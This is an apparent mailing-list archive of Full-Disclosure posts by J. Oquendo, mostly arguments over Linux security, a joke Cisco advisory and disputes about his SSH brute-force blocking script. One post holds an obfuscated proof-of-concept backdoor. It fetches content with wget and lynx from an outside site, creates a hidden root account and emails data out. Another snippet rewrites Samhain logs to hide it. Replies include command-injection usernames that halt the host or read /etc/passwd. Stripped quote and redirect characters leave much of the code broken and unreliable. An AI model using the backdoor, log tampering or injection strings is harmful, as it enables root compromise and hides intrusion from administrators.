awk -vfilename=$filename '{print perl -pi -e 
'\''s/'$filename'/samhain/g'\''}' /var/log/samhain_log|sh


What is does when run now is look for the instance of its name (the
backdoor's name) and rename it to Samhain. So if the file created
is called foo.h and Samhain logs it, it will go and rename foo.h
in the logs to Samhain. Tripwire is no difference unless both logs
are kept offline. On a side note, I started tinkering with a triple
threat mechanism of checksums: (SHA1 + MD5 + RIPE160)

http://www.infiltrated.net/scripts/saki.html

Just don't know if I want to devote time to doing a full blown
program. It works as is, but does nothing more than checksum
whatever is in my current path of which later I can do a diff
etc.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux big bang theory....

2007-05-10 Thread J. Oquendo

KJKHyperion wrote:



why, Windows machines of course, I'm an attacker, not a fool! If you 
were a terrorist, what would you rather do?


Crash the Twin Towers
Crash the dollar

There is no such thing as an attacker. All actions, even such an 
individual's, are driven by economical considerations.

With this said, if I were an attacker with economics in mind
why would I want to target a machine which has X amount of
vendors sifting through the much of malware and viruses when
I could spawn off an semi undetectable program and KEEP IT
THERE without having to wait for the next best thing.

I don't know about your logics on economics, but if I were
the attacker and I was looking for a constant steady stream
of revenue, I would go the Linux route. And if you think
for a second that Boohoo Linux users are more inclined to
be security conscious then you are the fool here. Of the
couple of thousand of brute force bots I see, none are on
Windows.

Whatever though, to each their own mechanisms of thought.
If you truly believe its all fine and dandy and things
won't get progressively worse by giving Linux to
inexperienced users, you are in for a rude awakening. If
you haven't stopped to read the facts that malware, *ware
creators are getting more savvy, then you seem to be
stuck somewhere in a world of fantasy.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Linux big bang theory....

2007-05-09 Thread J. Oquendo

Enjoy||Complain

# !/bin/sh
# Venomous
# Linux PoC backdoor keeper...
# http://www.infiltrated.net/ubuntuDestruction.php
# J. Oquendo (c) 05/09/2007 


# If you have to ask you shouldn't run this password for venomous
# is password


happy=`awk 'NR==59 {gsub(//,);print $3}' /usr/include/paths.h`
days=`awk 'NR==74 {gsub(/,/,);print $8}' /usr/include/sysexits.h`
guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
sed -n '1p' $happy|awk -F : 'BEGIN{OFS=:}{$1=venomous}1{$2=}2'  $days
sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F : 
'BEGIN{OFS=:}{$2='guitar'}2'  $happy
what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ){print $4 
-a}'`
echo Enter your email address ; read ans ; where=$ans
$who | $what $where


# Ugly method too keep a rootaccount Follows... For those not in the know...
# Venomous was an idea made to prove a point, not give script kiddiots another
# tool to be morons with. Instead of ruining things, how about solving...
# Instead of naysaying... Prove me wrong


# Pick a ranDumb file in /usr/includes/ then create the samevbackdoor on the
# system using this filename. Do something sneaky on your own to place this
# file on a startup I could show you, but then I would have to kill -9 you

# Note the location... Highly doubtable to remove an actual include file
# unless some stupid admin did something really dumb... Before someone mouths
# around via e-mail... I could have written this all inclusively but I chose
# not to for obvious reasons...

random=`date|awk -F : '{print $3}'|awk '{print $1}'`
echo $random  /tmp/secCommand
sad=`awk '{print ls /usr/include|sed -n '\''$1p'\''}' /tmp/secCommand|sed 
-n '1p'`
rm /tmp/secCommand
filename=`echo $sad|sh|awk -F . '{print $1}'`

lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n '226,233p' 
 /usr/local/include/$filename.h

# Now of course I could have modified this to replicate any one of the files
# on startup but again... PoC ... The naysayers will ramble on about You're
# out of your mind... Am I? I've given you the PoC's what more do you want...
# Ubuntu or any Linux for the lowly home user is a horrible idea...

# And AGAIN before someone fires off I would see the URL and that's a dead
# giveaway! ... Look, I'm trying to make a point here... I could have 
# a functioning backdoor undetectable to most integrity checkers, Samhain,

# Tripwire etc., but why should I disclose this anywhere. It's not in the
# best interest of anyone to do so... Don't bother asking for it via email
# because it's not public and will never be...

# This again... Was to prove a point to the naysayers who this shit doesn't
# happen... Keep dreaming. Its only a matter of time before you guys go
# Goo Goo about getting Linux for Idjits off the ground, but its a horrible
# mistake in the making


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Anyone have a Lindows/Linspire contact

2007-04-19 Thread J. Oquendo


Sorry to ask this of anyone on this list... If it bugs someone
please respond offlist no need to irritate others more than I
already have...

I'm hoping someone could provide me with a direct contact for
someone in Lindows/Linspire/*whatever*umbrella*name. Seems
they have a security issue on their hands... Tried getting
information from their fluffy website, no dice.

Tried whois, etc., no direct names available...


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Follow up browser DoS

2007-04-17 Thread J. Oquendo

Comments on Firefox 2.0.3 ... Mines hangs then regains its composure after
about 2 solid minutes of being stuck in hell.


Did nothing to Opera on Windows, OpenBSD or Linux...

Seemed to also toast out Firefox on FC5. Caused system to respond horribly.

[EMAIL PROTECTED] ~]# yum update firefox
Loading installonlyn plugin
Setting up Update Process
Setting up repositories
core [1/3]

.

-- Populating transaction set with selected packages. Please wait.
--- Downloading header for firefox to pack into transaction set.
firefox-1.5.0.10-1.fc5.i3 100% |=|  82 kB00:00
--- Package firefox.i386 0:1.5.0.10-1.fc5 set to be updated
-- Running transaction check

Dependencies Resolved

=
Package Arch   Version  RepositorySize
=
Updating:
firefox i386   1.5.0.10-1.fc5   updates18 M

Transaction Summary
=
Install  0 Package(s)
Update   1 Package(s)
Remove   0 Package(s)
Total download size: 18 M
Is this ok [y/N]: y
Downloading Packages:
(1/1): firefox-1.5.0.10-1 100% |=|  18 MB01:27
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
 Updating  : firefox  # [1/2]
 Cleanup   : firefox  # [2/2]

Updated: firefox.i386 0:1.5.0.10-1.fc5
Complete!

Copied and pasted top information ... Took me 3 minutes to actually copy
and paste the information...

Tasks: 118 total,   1 running, 116 sleeping,   0 stopped,   1 zombie
Cpu(s): 73.7% us, 25.3% sy,  0.0% ni,  0.0% id,  0.0% wa,  1.0% hi,  0.0% si
Mem:   1034412k total,  1019464k used,14948k free, 1600k buffers
Swap:  2031608k total,   317436k used,  1714172k free,41184k cached

 PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEMTIME+  COMMAND
27474 root  18   0 1178m 838m  17m D  1.0 83.0   0:21.43 firefox-bin


[EMAIL PROTECTED] ~]# killall -9 firefox-bin
firefox-bin: no process killed
[EMAIL PROTECTED] ~]# killall -9 firefox-bin
[EMAIL PROTECTED] ~]#

Killed it once... Nope... System didn't even acknowledge it. Stood running for
a few seconds till I killall -9'd it again. Damn you firefox!



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INVASION OF THE CHILD HACKERS

2007-04-16 Thread J. Oquendo

Dr. Neal Krawetz, PhD wrote:

* PGP Signed by an unknown key


However and the thing that really got my attention was the age
range. They say “ages 3 and older”. What kind of 3-year-old is
surfing the web and using IM, and sending email? Between 3 and 5
years old and most children are just starting to learn the
alphabet. The average 5-year-old should be able to read simple
words. Granted, there are some online games for tots and is that
really the same as using the Internet? (Use a VCR or DVD player?
Sure and I've seen 2-year-olds do that… But a tot surfing the web?
Really?)


Why can't you picture a 3 year old using the Internet. There are a lot 
of resources available
for kids. A computer can be setup with bookmarks for tots, e.g. Cartoon 
Network, Sesame

Street, etc.,



All of this makes me wonder… How soon before the RIAA begins suing
3-year-olds for illegal downloads? I mean and they have already
gone after a 7-year-old. (And the 7-year-old was female.
Coincidence? I think not!)  Also, with this many young females
online, I might need to trade my significant other M. in for a more
attractive model.  ;-)

One could infer you mean a child from your comment. I might need to 
trade my significant other...
for a more attractive model... You mention this in the same paragraph 
as you mention childern.



EHAP WATCH OUT!


For what

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Let's Winnuke Google!

2007-04-12 Thread J. Oquendo

[EMAIL PROTECTED] wrote:

information that can be derived from an IP address.) I doubt that
Google is a private company that generates revenue off of their
targeted advertising expertise, and there is absolutely no
legitimate value in this information to anyone. While it is
acceptable to ignorantly profile based on ethnicity and
nationality, it is not acceptable to analyze marketing statistics
based on geographic location. No good can come from this!


Yawn, yawn and more yawn. Google is a publicly traded company.

Your comments about targeted advertising based on geographic
locations are wrong. If you own a ski supply company, what
purpose would it serve to have ads dished out to people in
I don't know say Las Vegas or Miami.

As for the rest of this rambling... Old and inaccurate news.


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams


smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Stereotyping DoS and Don'ts

2007-04-04 Thread J. Oquendo

[EMAIL PROTECTED] wrote:

I infer you're under the impression that this may some form of
de-facto profiling of DoS kiddiots. But ask yourself, how hard
would it be to take any of the given information you disclosed
for an attacker in say America to be punctual in his attacks
so that they may now mimic your mentioned Western European or
Chinese attackers.

  * The USA and Canada are stereotypical in that they are not
 extreme in any single dimension. An attack may not start precisely
 at 1:00, but it will be around 1:00, it may not be homogeneous,
 but it will be close. And it may change as needed rather then
 exhaust one attack method. Americans are also more solitary. You
 won't see a hundred American hackers working in unison on the same
 target as you would in China or Brazil.

Assumptions. Back in the mid to late 90's American script kiddiot
groups were known for throwing their tags all over webpages.
Groups ranged in size and judging by some of the IRC channels
and forums of those times, some of these channels and groups
were rather large. If you take a look at say Electronic Disturbance
Theater, the numbers could have exceeded your best guesses, they
were coordinated on a worldwide scale and they were on time.
Regardless of the fact that they may have been American
or Chinese.

  * The recent DoS against the root level DNS servers started
 exactly on the hour. At intervals of 1 hour, there were changes to
 the attack method. Both the Western Europe and China match this
 kind of attack: precisely timed, planned, homogeneous, and
 exhaustive.

It's nice to assume but I could spend a day poking holes in
your theory.

  * Similar to Blue Frog, the Smurf attacks from Mafiaboy were not
 precisely timed, but were exhaustive, showed short-term planning,
 and were independent attacks. Mafiaboy was Canadian.

What you think you may know based on media accounts just might
be wrong. For those on the greyhat scene in tune to what was
going down at the time, most will know mafiaboy wasn't the sole
culprit albeit he took the brunt of it all. I won't get into
more than that.

 Stereotyping and profiling is commonly criticized for its
 inaccuracy.

Assumptions should be criticized for providing vague
information however, its a nice idea but filled with too many
holes. While your idea sounds interesting, you're missing many
of the essential FACTS to quantify the whole case on building
Who is DoS'ing Your Servers movement.

So to help you a bit more... Here are some profiles to add:

Swedish attackers:
They will ponder if they want to actually partake in the DoS.
They'll sit back and think whether it is a fair war to get
into, or whether they should sit back and let others attack
as to not involve themselves in that war.

Spaniards: They'll plan to attack at 1PM their time but
the attack won't begin until 4PM as an attack will end up
interfering with their siesta. A Spaniard will never
attack during siesta time.

Irish attackers. Although they'll meticulously plan the
attack, due to the fact they sidestepped into a pub, by
the time the attack is set to start, they'll likely be
too drunk to initiate it.

Nigerian attackers. They'll plan out a massive DoS
attack but sidestep it in order to offer their victims
a wire transfer of $10,000,000,000.00 from their
deceased uncle Jimbobzinunu.

On a serious note, I find it a bit strange that many
who haven't been on the scene for quite some time
point out modified histories of what occurred. Perhaps
its time for a tell all book to be written about the
so called hacker/cracker scene from the mid nineties
through now.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Stereotyping DoS and Don'ts

2007-04-04 Thread J. Oquendo

[EMAIL PROTECTED] wrote:



History is always written by the winning side.


I couldn't agree more

On the flip side, is there actually *any* one person who's in a position
to give the real scoop on how things looked from the hacker/cracker side
of the fence for that decade?

I think there are about two handfuls that I know of that can place it all
together but I also know in doing so many careers could be ruined as well
as current businesses to some degree.


I can think of a bunch of people who could
talk about their corner of the scene, but by 1990 it was big enough that
no one person could know all of it other than by hearsay


Of the people I had in mind, it definitely would not be hearsay. When I
describe the 90's I'm talking about the mid through late 90's and I mean
this in the sense of those who were making noise on the scene with their
attacks - keep in mind the original post was about script kiddiots (DoS)
so I believe on that portion of individuals who were out attacking
sites, defacing, etc., it would be easier than you think to put the
puzzle together name names and give accounts of what truly happened.

Would be an interesting read, but the author would also face the wraith
of feds because they could possibly expose snitches, informants, rats
however you want to call them.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cisco IP Phone vulnerability

2007-03-31 Thread J. Oquendo
-BEGIN LSD SIGNED MESSAGE-

Infiltrated.net Security Advisory:
Cisco IP Phone Denial of Service
http://www.infiltrated.net/ciscoIPPhone7960.html
Revision 6.9

For Public Release

Summary
The Cisco IP Phones are subject to a denial of
service.

This vulnerability has not yet been documented
by Cisco but it should be allocated the bug ID
31337 by staff @ PSIRT

This advisory will be posted at
http://www.infiltrated.net/ciscoIPPhone7960.html

Affected Products
All Cisco IP Phones

Proof of Concept
http://infiltrated.net/7960poc.jpg

Cisco Security Procedures
Complete information on reporting security
vulnerabilities in Cisco products, obtaining
assistance with security incidents, and
registering to receive security information from
Cisco, is available on Cisco's website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html 
All Cisco security advisories are available at 
http://www.cisco.com/go/psirt.


Details
Cisco IP Phones are subject to a denial of service.
Users who disconnect their ethernet cables will
lose their dial tones and their present call will
drop as well as subsequent incoming calls.

While the attack may be local at present time,
security engineers Infiltrated Networks (a division
of Fscker Inc. with no relation to Halliburton)
are devising telekinetic attacks along with Miss
Cleo in order to provide a working disconnection
attack tool.


Impact
All your phone sex belongs to null 0

Software Versions and Fixes
The only fix is to plug your phone back into a PoE
switch or plug in its power cord.

Obtaining Fixed Software
Infiltrated Networks and Fscker Inc. is offering
its services at the low price of $1000.00 an hour
in consulting fees to remedy this attack, with a
100 hour minimum retainer fee. In fact, for those
seeking to purchase a PoC code of the mentioned
vulnerability, contact us, we'll gladly take your
milk money.

Workarounds
Don't unplug your phone. Don't unplug your PoE
switches. Don't live in areas where electricity
is sporadic. Don't play with matches, and don't
drive while under the influence of anything that
is currently mentioned at http://www.bumwine.com

Exploitation and Public Announcements
Infiltrated.net is not aware of any public
announcements or malicious use of the
vulnerability described in this advisory.

This vulnerability was reported to us
losers, by another bigger loser who wishes
to retain his or her anonyminity out of
fear of obtaining Michael Lynn Disease
where a frivolous denial of service attack
via litigation will ensue and weaken the
immune system.

Status of This Notice: FINAL
This is a final Infiltrated.net advisory. Although
we cannot guarantee the accuracy of all statements
in this notice, we still passed it on to you the
consumer knowing full well a cease and desist letter
will be sent and added to our collection. All of the
facts have however been checked to the best of our
ability while not under the influence of Prozac,
Valtrex, Valium, Lithium and lest we forget, weapons
of mass destruction of which you will not find since
we have them buried in the secret stash boxes of our
Nissan, Lexus, WRX, and Cherokee alongside our Glocks.


Revision History
Revision 6.9Initial public release



This notice is Copyright 2007 by Infiltrated.net.
This notice may be redistributed freely after the
release date given at the top of the text,
provided that redistributed copies are complete
and unmodified, and include all date and version
information. Pictures of your fiance, wife,
girlfriend can be e-mailed to us if said
individuals did not yet e-mail to us on their
own. Infiltrated Networks, sil, and our oddball
affiliates remind those on the security scene to
keep it real. 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Thierry Zoller wrote:

Dear All,

You are arguing over hypothesises where facts could rule. PLEASE someone
just setup the script on a test environment and present us your
results. Heck, it's not that we are discussing Metaproblems here,
these are computers.

Just install and make a PoC and enhance security for all
for the sake of it. Thanks :)


  
The problem with the whole thread was well someone could do XXX Sure 
they could... Anyone could... My point was someone shooting a message 
back to the list stating Your program is a backdoor. It never was and 
it never will be. Can someone modify it on their own and make it a 
backdoor? Sure. Can someone inject something into the columns I was 
parsing, possible. Anything is possible. Since then I re-wrote arguments 
people were griping about:


ifaddr=`ifconfig -a|awk '/inet/  !/inet6/  !/127.0/  
!/192.168/{print $2}'|sed 's/addr\://g'`


function IPT {

grep -E 
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' 
/etc/hosts.deny|\

awk '!/#//\./!a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22 
-j REJECT}'|\

awk '/iptables/!/#/!/-s  -i/'|sh

}

The complaint was anyone can insert $foo into the thirteenth column... 
Try it instead of mouthing off about it. Someone can possible inject 
tartar sauce into a sealed jar Is it possible, sure it probably is, 
show me though instead of yapping off. Someone else griped, someone can 
craftily insert your own address into an IP table. Look if someone is 
THAT stupid of an admin to not test things first, modify it to their 
needs, and gets themselves locked out of their own machine, they have no 
business on that machine. Period.






--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Tavis Ormandy wrote:


However, it is certainly possible. Here is an example.

#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd)'
ssh -o BatchMode yes a a $command@$1

Which produces log entries like this:
 
Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd)

Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a 
$(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd) from 
127.0.0.1 port 47403 ssh2

Note that the 13th field both contains a dot and is entirely controlled
by me. This string is placed in /etc/hosts.deny by the script after
executed by cron.

The $1 in the awk script below is the entire string, which is piped
unsanitised into /bin/sh:

awk '!/#/  /\./  !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/  !/#/  !/-s  -i/'|sh

The results are obvious.
  


Incorrect did you look at the fix? It isn't unsanitized as you state:

Firstly data being passed is not coming through via /var/log/secure or 
/var/log/auth* its coming in via /etc/hosts.deny


function IPT {

grep -E 
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' 
/etc/hosts.deny|\

sed 's/::://g'|\
awk '!/#//\./!a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d 208.51.101.194 -p TCP 
--dport 22 -j REJECT}'|\

awk '/iptables/!/#/!/-s  -i/'|sh

}

[EMAIL PROTECTED] ~]# cat testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44
2383274298734
sakjdhasiuwe
hacker
aaa
bbb
ccc
0wn3d
[EMAIL PROTECTED] ~]# grep -E 
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' 
testing.deny

89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44

So the buck stops there before it is put into the shell.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Tavis Ormandy wrote:

On Tue, Nov 28, 2006 at 10:56:33AM -0500, J. Oquendo wrote:
  

Incorrect did you look at the fix? It isn't unsanitized as you state:



J, you have made an attempt to fix it, but is is not sufficient.

An attacker can still add arbitrary hosts to the deny list.

Thanks, Tavis.

  
Right... And as I stated on a different post... If an inexperienced 
admin allows that, it is on them. My attempt at making what I NEEDED and 
thought was helpful succeeded. If someone wants to nc insert arbitrary 
addresses, so be it. No different that someone spoofing random addresses 
at a firewall. What are you going to do, sift through  every single 
address touching your network. Heck for what you just claimed An 
attacker can still add arbitrary hosts to the deny list. ... it is not 
sufficient ... TCP/IP is not sufficient with all of its issues. Give me 
a break


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Tavis Ormandy wrote:

On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote:
I notice you also havnt solved the local privilege escalation, this can
be abused by local users to gain root by attempting to login with the
username set to a valid passwd entry and then winning the race condition
by creating a symlink to the system passwd file (of course, there are
dozens of other attacks).

Thanks, Tavis.


And just what on God's earth does SOMEONE LOGGING IN WITH USERNAME SET 
TO A VALID PASSWORD ENTRY have to do with this script. Let me take my 
script out of the equation for a minute. SOMEONE LOGS IN WITH A 
USERNAME SET TO A VALID PASSWORD ENTRY don't you think this is a 
problem with the system they're on? Please explain to me how because I'm 
seriously curious to know how you envision this happening with this 
script of mine.


Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
awk '($5==Illegal||$6==Illegal)$9==from{print $10}'

Would stop the insertion attack and only print out the tench field if 
fields 5, 6 and 9 match Illegal user from.


So that would pretty much minimize the attack on name insertion. If I 
wanted to I could also make sure that if someone came after field 10, 
then ignore the entire line:

Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227

But before you shoot back let me send your response for you:

Tavis Ormandy will write:
 Someone could log in using: Illegal User foo from 

$OWNIPADDRESS@host which would make an entry:
 Nov 27 16:31:21 local sshd[67010]: Illegal user  dd from  Illegal User 

foo from $OWNIPADDRESS 213.134.128.227

SO let me restate. I could modify it to look at lines 5, 6, and 9 ... 
Take a look at the tenth column and if anything comes after 
that...Ignore that entire line... Should I have done so, maybe... Will I 
do so... Maybe...


But wait there's more... Before you respond back Tavis, I will do so for 
you:


Tavis Ormandy will write:
 Someone could cause a race condition in awk that will allow peanut 
butter to seep into my colo


Sorry can't help you there.

As to a fix to someone injecting ranDumb addresses. That same awk 
statement above will work but if they're doing some netcat voodoo, then 
feel free to shoot off another email on how my script broke TCP/IP entirely.




--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo

Anders B Jansson wrote:

Just one possibly silly question.

Why are you working so hard to do this with complex scripts and stuff?

I just wrote a little C snippet that runs on the firewall.
All servers allowing external ssh send a copy of ssh auth to a port
on the firewall.

If it detects a brute force it adds the host to the block list and
everything from that host is silently dropped.

Added a whitelist function to avoid DOS attempts.

Works perfect, and adds community service by letting the trawlers
hang until they timeout.
  
The purpose of this wasn't to reinvent the wheel. It was to allow those 
using the tool to report the addresses of anyone brute forcing ssh. 
These addresses are going to be posted for others to see. Something like 
an RBL for brute forcers.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
For those interested, I wrote a program called Sharpener which is an SSH 
brute force blocking tool that also reports back the offenders' 
addresses. I have begun posting the information on the attackers as well 
as sending out messages (whenever possible) to the admins of these 
domains. Think of it as an RBL for SSH attackers. The goal is to 
identify these machines in order for others to implement safeguards 
(ACL's) against these hosts. Feel free to comment/complain.



http://www.infiltrated.net/sharpener (tool)
http://www.infiltrated.net/bruteforcers (offenders)

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:


Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

  


Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)


if [ `whoami` != root ]

   then  echo This script needs to run under the root user
exit

else

if [ -e /tmp/hosts.deny ]

   then
rm /tmp/hosts.deny
fi
/

Check to see if the user is root. If not, tell the user Hey dumbass, you
need to be root, if the user is root, continue.

/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru  
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./  //{print $2}'  
/etc/hosts.deny

/

There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in 
/etc/hosts.deny

into /etc/hosts.deny

/
OS=$( uname|sed -n '1p')
/

This is a no brainer. No voodoo there.

# IPTables function...
ifaddr=`ifconfig -a|awk '/inet/  !/inet6/  !/127.0/  
!/192.168/{print $2}'|sed 's/addr\://g'`


Do an ifconfig on the machine. Ignore the word inet, inet6, 127.0, 
192.168, print
the second field, and replace the term addr: with nothing. No voodoo 
here jackass.


/
function IPT {

awk '!/#/  /\./  !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22 
-j REJECT}' /etc/hosts.deny |\

awk '/iptables/  !/#/  !/-s  -i/'|sh

}
/

This is such a hacker thing coming now. You caught me.

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk 
hacking)


/
if [ $OS = Linux ]

   then
   IPT

fi
/

This is where I guess I hack the world. Check the OS and if it's Linux, 
then


cat /etc/hosts.deny

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk 
